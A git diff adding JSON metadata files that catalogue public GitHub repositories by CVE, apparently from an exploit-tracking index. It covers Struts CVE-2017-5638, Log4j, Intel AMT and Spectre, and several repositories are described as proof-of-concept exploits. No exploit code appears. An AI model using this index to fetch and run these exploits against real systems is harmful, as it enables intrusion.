"andypitcher\/check_struts", + "owner": { + "login": "andypitcher", + "id": 12878731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12878731?v=4", + "html_url": "https:\/\/github.com\/andypitcher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andypitcher\/check_struts", + "description": "Apache Struts version analyzer (Ansible) based on CVE-2017-5638", + "fork": false, + "created_at": "2018-09-04T18:19:26Z", + "updated_at": "2023-12-14T13:39:46Z", + "pushed_at": "2018-10-29T21:49:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 158640611, + "name": "CVE-2017-5638", + "full_name": "un4ckn0wl3z\/CVE-2017-5638", + "owner": { + "login": "un4ckn0wl3z", + "id": 16059320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16059320?v=4", + "html_url": "https:\/\/github.com\/un4ckn0wl3z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/un4ckn0wl3z\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2018-11-22T04:02:59Z", + "updated_at": "2024-09-17T13:05:55Z", + "pushed_at": "2018-11-22T04:08:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 177221305, + "name": "CVE-2017-5638", + "full_name": "colorblindpentester\/CVE-2017-5638", + "owner": { + "login": "colorblindpentester", + "id": 45195264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45195264?v=4", + "html_url": "https:\/\/github.com\/colorblindpentester", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/colorblindpentester\/CVE-2017-5638", + "description": "CVE-2017-5638 (PoC Exploits)", + "fork": false, + "created_at": "2019-03-22T23:25:49Z", + "updated_at": "2019-03-22T23:30:08Z", + "pushed_at": "2019-03-22T23:29:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2017", + "cve-2017-5638", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 202619396, + "name": "cve-2017-5638", + "full_name": "injcristianrojas\/cve-2017-5638", + "owner": { + "login": "injcristianrojas", + "id": 862690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/862690?v=4", + "html_url": "https:\/\/github.com\/injcristianrojas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/injcristianrojas\/cve-2017-5638", + "description": "Demo app of THAT data broker's security breach", + "fork": false, + "created_at": "2019-08-15T22:27:23Z", + "updated_at": "2019-09-07T02:06:14Z", + "pushed_at": "2022-04-22T21:44:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 291728915, + "name": "XworkStruts-RCE", + "full_name": "ludy-dev\/XworkStruts-RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/XworkStruts-RCE", + "description": "(CVE-2017-5638) XworkStruts RCE Vuln test script", + "fork": false, + "created_at": "2020-08-31T13:53:37Z", + "updated_at": "2020-11-07T10:14:21Z", + "pushed_at": "2020-11-07T10:14:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 305391186, + "name": "struts2-rce", + "full_name": "sonatype-workshops\/struts2-rce", + "owner": { + "login": "sonatype-workshops", + "id": 73115547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73115547?v=4", + "html_url": "https:\/\/github.com\/sonatype-workshops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sonatype-workshops\/struts2-rce", + "description": "Exploitable target to CVE-2017-5638", + "fork": false, + "created_at": "2020-10-19T13:21:30Z", + "updated_at": "2022-12-19T16:15:14Z", + "pushed_at": "2022-08-18T19:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 319075797, + "name": "CVE-2017-5638", + "full_name": "jongmartinez\/CVE-2017-5638", + "owner": { + "login": "jongmartinez", + "id": 11743460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11743460?v=4", + "html_url": "https:\/\/github.com\/jongmartinez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jongmartinez\/CVE-2017-5638", + "description": "PoC for CVE: 2017-5638 - Apache Struts2 S2-045", + "fork": false, + "created_at": "2020-12-06T16:16:43Z", + "updated_at": "2022-06-16T02:49:49Z", + "pushed_at": "2020-12-06T16:39:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 379816029, + "name": "CVE-2017-5638", + "full_name": "Badbird3\/CVE-2017-5638", + "owner": { + "login": "Badbird3", + "id": 51175524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51175524?v=4", + "html_url": "https:\/\/github.com\/Badbird3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Badbird3\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2021-06-24T05:41:45Z", + "updated_at": "2021-06-24T05:43:55Z", + "pushed_at": "2021-06-24T05:43:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 392774963, + "name": "struts_hack", + "full_name": "jptr218\/struts_hack", + "owner": { + "login": "jptr218", + "id": 84092766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jptr218\/struts_hack", + "description": "An implementation of CVE-2017-5638", + "fork": false, + "created_at": "2021-08-04T17:27:55Z", + "updated_at": "2021-08-20T09:57:33Z", + "pushed_at": "2021-08-20T09:57:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459374550, + "name": "vulnerability_struts-2.3.31", + "full_name": "testpilot031\/vulnerability_struts-2.3.31", + "owner": { + "login": "testpilot031", + "id": 7565250, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7565250?v=4", + "html_url": "https:\/\/github.com\/testpilot031", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/testpilot031\/vulnerability_struts-2.3.31", + "description": "Build the struts-2.3.31 (CVE-2017-5638) environment", + "fork": false, + "created_at": "2022-02-15T00:38:47Z", + "updated_at": "2022-02-15T00:45:01Z", + "pushed_at": "2022-02-15T01:08:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464522849, + "name": "CVE-2017-5638", + "full_name": "readloud\/CVE-2017-5638", + "owner": { + "login": "readloud", + "id": 67372333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67372333?v=4", + "html_url": "https:\/\/github.com\/readloud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/readloud\/CVE-2017-5638", + "description": "This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock.", + "fork": false, + "created_at": "2022-02-28T14:49:52Z", + "updated_at": "2022-02-28T14:52:17Z", + "pushed_at": "2022-02-28T14:51:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-struts-2-vulnerability", + "cve-2017-5638", + "struts-shock" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 474902004, + "name": "CVE-2017-5638", + "full_name": "Tankirat\/CVE-2017-5638", + "owner": { + "login": "Tankirat", + "id": 19858155, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19858155?v=4", + "html_url": "https:\/\/github.com\/Tankirat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tankirat\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2022-03-28T07:58:31Z", + "updated_at": "2022-03-28T07:58:31Z", + "pushed_at": "2022-03-28T09:50:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481444491, + "name": "CVE-2017-5638", + "full_name": "0xConstant\/CVE-2017-5638", + "owner": { + "login": "0xConstant", + "id": 51972282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xConstant\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2022-04-14T02:48:22Z", + "updated_at": "2024-07-01T10:35:27Z", + "pushed_at": "2022-04-14T02:52:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580942836, + "name": "Exploit-CVE-2017-5638", + "full_name": "mfdev-solution\/Exploit-CVE-2017-5638", + "owner": { + "login": "mfdev-solution", + "id": 75241749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75241749?v=4", + "html_url": "https:\/\/github.com\/mfdev-solution", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mfdev-solution\/Exploit-CVE-2017-5638", + "description": "this exemple of application permet to test the vunerability CVE_2017-5638", + "fork": false, + "created_at": "2022-12-21T21:14:12Z", + "updated_at": "2022-12-21T21:20:54Z", + "pushed_at": "2022-12-21T21:20:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608470762, + "name": "CVE-2017-5638", + "full_name": "mritunjay-k\/CVE-2017-5638", + "owner": { + "login": "mritunjay-k", + "id": 41521418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41521418?v=4", + "html_url": "https:\/\/github.com\/mritunjay-k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mritunjay-k\/CVE-2017-5638", + "description": "An exploit for CVE-2017-5638", + "fork": false, + "created_at": "2023-03-02T04:37:09Z", + "updated_at": "2023-03-02T04:40:55Z", + "pushed_at": "2023-03-02T10:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639166342, + "name": "CVE-2017-5638-ApacheStruts2.3.5", + "full_name": "FredBrave\/CVE-2017-5638-ApacheStruts2.3.5", + "owner": { + "login": "FredBrave", + "id": 114189847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FredBrave\/CVE-2017-5638-ApacheStruts2.3.5", + "description": "A exploit for CVE-2017-5638. This exploit works on versions 2.3.5-2.3.31 and 2.5 – 2.5.10", + "fork": false, + "created_at": "2023-05-10T22:48:58Z", + "updated_at": "2023-05-10T23:10:04Z", + "pushed_at": "2023-05-10T23:10:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827395652, + "name": "web-application-firewall-", + "full_name": "Nithylesh\/web-application-firewall-", + "owner": { + "login": "Nithylesh", + "id": 92871492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92871492?v=4", + "html_url": "https:\/\/github.com\/Nithylesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nithylesh\/web-application-firewall-", + "description": "This project demonstrates a Web Application Firewall (WAF) simulation using Flask and a vulnerability checker for CVE-2017-5638. The WAF middleware blocks HTTP requests containing specific patterns, and the vulnerability checker tests for and exploits the Apache Struts 2 vulnerability (CVE-2017-5638).", + "fork": false, + "created_at": "2024-07-11T15:16:56Z", + "updated_at": "2024-07-11T15:19:54Z", + "pushed_at": "2024-07-11T15:19:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 852437483, + "name": "CVE-2017-5638-PoC", + "full_name": "kloutkake\/CVE-2017-5638-PoC", + "owner": { + "login": "kloutkake", + "id": 112651256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112651256?v=4", + "html_url": "https:\/\/github.com\/kloutkake", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kloutkake\/CVE-2017-5638-PoC", + "description": "This repository provides a PoC for CVE-2017-5638, a remote code execution vulnerability in Apache Struts 2, exploitable via a crafted Content-Type HTTP header.", + "fork": false, + "created_at": "2024-09-04T19:59:29Z", + "updated_at": "2024-09-12T01:41:00Z", + "pushed_at": "2024-09-12T01:40:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5645.json b/2017/CVE-2017-5645.json new file mode 100644 index 0000000000..b939afeaac --- /dev/null +++ b/2017/CVE-2017-5645.json @@ -0,0 +1,83 @@ +[ + { + "id": 99288784, + "name": "CVE-2017-5645", + "full_name": "pimps\/CVE-2017-5645", + "owner": { + "login": "pimps", + "id": 11393266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11393266?v=4", + "html_url": "https:\/\/github.com\/pimps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pimps\/CVE-2017-5645", + "description": "CVE-2017-5645 - Apache Log4j RCE due Insecure Deserialization", + "fork": false, + "created_at": "2017-08-04T01:12:47Z", + "updated_at": "2024-11-01T02:37:42Z", + "pushed_at": "2018-11-18T11:14:20Z", + "stargazers_count": 91, + "watchers_count": 91, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 91, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438418716, + "name": "log4shell-finder", + "full_name": "HynekPetrak\/log4shell-finder", + "owner": { + "login": "HynekPetrak", + "id": 8593983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4", + "html_url": "https:\/\/github.com\/HynekPetrak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HynekPetrak\/log4shell-finder", + "description": "Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.", + "fork": false, + "created_at": "2021-12-14T22:27:14Z", + "updated_at": "2024-09-10T05:00:03Z", + "pushed_at": "2023-06-21T11:37:03Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5645", + "cve-2019-17571", + "cve-2020-9488", + "cve-2021-4104", + "cve-2021-42550", + "cve-2021-44228", + "cve-2021-44832", + "cve-2021-45046", + "cve-2021-45105", + "cve-2022-23302", + "cve-2022-23305", + "cve-2022-23307", + "log4j", + "log4j2", + "log4shell", + "scanner", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 38, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5689.json b/2017/CVE-2017-5689.json new file mode 100644 index 0000000000..fb319d7825 --- /dev/null +++ b/2017/CVE-2017-5689.json @@ -0,0 +1,157 @@ +[ + { + "id": 90210170, + "name": "CVE-2017-5689", + "full_name": "CerberusSecurity\/CVE-2017-5689", + "owner": { + "login": "CerberusSecurity", + "id": 21088337, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21088337?v=4", + "html_url": "https:\/\/github.com\/CerberusSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CerberusSecurity\/CVE-2017-5689", + "description": null, + "fork": false, + "created_at": "2017-05-04T01:51:26Z", + "updated_at": "2024-01-17T16:00:11Z", + "pushed_at": "2017-05-04T03:06:32Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 39, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 90472957, + "name": "amthoneypot", + "full_name": "haxrob\/amthoneypot", + "owner": { + "login": "haxrob", + "id": 11153104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11153104?v=4", + "html_url": "https:\/\/github.com\/haxrob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haxrob\/amthoneypot", + "description": "Honeypot for Intel's AMT Firmware Vulnerability CVE-2017-5689", + "fork": false, + "created_at": "2017-05-06T15:35:42Z", + "updated_at": "2024-09-21T11:32:28Z", + "pushed_at": "2024-02-15T22:50:51Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 90724328, + "name": "intel_amt_bypass", + "full_name": "Bijaye\/intel_amt_bypass", + "owner": { + "login": "Bijaye", + "id": 4318412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4318412?v=4", + "html_url": "https:\/\/github.com\/Bijaye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bijaye\/intel_amt_bypass", + "description": "simple python poc for CVE-2017-5689", + "fork": false, + "created_at": "2017-05-09T08:55:39Z", + "updated_at": "2022-03-07T16:29:42Z", + "pushed_at": "2017-05-09T00:42:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 98579784, + "name": "amt_auth_bypass_poc", + "full_name": "embedi\/amt_auth_bypass_poc", + "owner": { + "login": "embedi", + "id": 24190344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190344?v=4", + "html_url": "https:\/\/github.com\/embedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/embedi\/amt_auth_bypass_poc", + "description": "CVE-2017-5689 Proof-of-Concept exploit", + "fork": false, + "created_at": "2017-07-27T21:06:08Z", + "updated_at": "2024-07-20T21:35:26Z", + "pushed_at": "2017-07-27T21:08:49Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 55, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 385968702, + "name": "CVE-2017-5689-Checker", + "full_name": "TheWay-hue\/CVE-2017-5689-Checker", + "owner": { + "login": "TheWay-hue", + "id": 64380347, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64380347?v=4", + "html_url": "https:\/\/github.com\/TheWay-hue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheWay-hue\/CVE-2017-5689-Checker", + "description": null, + "fork": false, + "created_at": "2021-07-14T14:26:29Z", + "updated_at": "2021-07-14T14:35:22Z", + "pushed_at": "2021-07-14T14:35:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5693.json b/2017/CVE-2017-5693.json new file mode 100644 index 0000000000..891981d3f5 --- /dev/null +++ b/2017/CVE-2017-5693.json @@ -0,0 +1,37 @@ +[ + { + "id": 89408243, + "name": "Puma6Fail", + "full_name": "LunNova\/Puma6Fail", + "owner": { + "login": "LunNova", + "id": 782440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/782440?v=4", + "html_url": "https:\/\/github.com\/LunNova", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LunNova\/Puma6Fail", + "description": "CVE-2017-5693 Denial of service vulnerability in Puma 6 modems", + "fork": false, + "created_at": "2017-04-25T21:25:43Z", + "updated_at": "2024-06-26T22:43:13Z", + "pushed_at": "2024-01-17T01:51:03Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "networking", + "rust", + "security-vulnerability" + ], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5715.json b/2017/CVE-2017-5715.json new file mode 100644 index 0000000000..0d742085ba --- /dev/null +++ b/2017/CVE-2017-5715.json @@ -0,0 +1,170 @@ +[ + { + "id": 116768537, + "name": "exploit-cve-2017-5715", + "full_name": "opsxcq\/exploit-cve-2017-5715", + "owner": { + "login": "opsxcq", + "id": 16995025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16995025?v=4", + "html_url": "https:\/\/github.com\/opsxcq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/opsxcq\/exploit-cve-2017-5715", + "description": "Spectre exploit", + "fork": false, + "created_at": "2018-01-09T05:06:12Z", + "updated_at": "2024-06-13T11:31:58Z", + "pushed_at": "2018-01-09T22:27:25Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "intelbug", + "memory-leak", + "spectre" + ], + "visibility": "public", + "forks": 19, + "watchers": 55, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 117425769, + "name": "meltdown-spectre-bios-list", + "full_name": "mathse\/meltdown-spectre-bios-list", + "owner": { + "login": "mathse", + "id": 5393624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5393624?v=4", + "html_url": "https:\/\/github.com\/mathse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mathse\/meltdown-spectre-bios-list", + "description": "a list of BIOS\/Firmware fixes adressing CVE-2017-5715, CVE-2017-5753, CVE-2017-5754", + "fork": false, + "created_at": "2018-01-14T11:52:38Z", + "updated_at": "2022-09-20T07:15:21Z", + "pushed_at": "2018-03-27T19:59:31Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bios", + "cve-2017-5715", + "cve-2017-5753", + "cve-2017-5754", + "firmware", + "meltdown", + "spectre" + ], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 117585225, + "name": "SpeculativeExecutionAssessment", + "full_name": "GregAskew\/SpeculativeExecutionAssessment", + "owner": { + "login": "GregAskew", + "id": 1266780, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1266780?v=4", + "html_url": "https:\/\/github.com\/GregAskew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GregAskew\/SpeculativeExecutionAssessment", + "description": "Assesses a system for the \"speculative execution\" vulnerabilities described in CVE-2017-5715, CVE-2017-5753, CVE-2017-5754", + "fork": false, + "created_at": "2018-01-15T19:14:30Z", + "updated_at": "2019-11-24T15:45:44Z", + "pushed_at": "2019-11-24T15:45:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 117944815, + "name": "retpoline-audit", + "full_name": "dmo2118\/retpoline-audit", + "owner": { + "login": "dmo2118", + "id": 11342823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11342823?v=4", + "html_url": "https:\/\/github.com\/dmo2118", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dmo2118\/retpoline-audit", + "description": "A quick-and-dirty tool to verify that userspace executables are immune to Spectre variant 2 (CVE-2017-5715).", + "fork": false, + "created_at": "2018-01-18T06:55:53Z", + "updated_at": "2018-01-20T08:00:58Z", + "pushed_at": "2018-02-01T07:40:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796785481, + "name": "Analisi-CVE-2017-5715", + "full_name": "GalloLuigi\/Analisi-CVE-2017-5715", + "owner": { + "login": "GalloLuigi", + "id": 71981111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71981111?v=4", + "html_url": "https:\/\/github.com\/GalloLuigi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GalloLuigi\/Analisi-CVE-2017-5715", + "description": null, + "fork": false, + "created_at": "2024-05-06T16:15:40Z", + "updated_at": "2024-05-06T16:24:28Z", + "pushed_at": "2024-05-06T16:24:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5721.json b/2017/CVE-2017-5721.json new file mode 100644 index 0000000000..233b67be21 --- /dev/null +++ b/2017/CVE-2017-5721.json @@ -0,0 +1,38 @@ +[ + { + "id": 107970036, + "name": "smm_usbrt_poc", + "full_name": "embedi\/smm_usbrt_poc", + "owner": { + "login": "embedi", + "id": 24190344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190344?v=4", + "html_url": "https:\/\/github.com\/embedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/embedi\/smm_usbrt_poc", + "description": "CVE-2017-5721 Proof-of-Concept", + "fork": false, + "created_at": "2017-10-23T11:00:18Z", + "updated_at": "2024-03-03T03:35:56Z", + "pushed_at": "2017-10-23T12:41:22Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chipsec", + "cve-2017-5721", + "poc", + "smm" + ], + "visibility": "public", + "forks": 12, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5753.json b/2017/CVE-2017-5753.json new file mode 100644 index 0000000000..2b0649f294 --- /dev/null +++ b/2017/CVE-2017-5753.json @@ -0,0 +1,246 @@ +[ + { + "id": 116195445, + "name": "spectre-attack", + "full_name": "Eugnis\/spectre-attack", + "owner": { + "login": 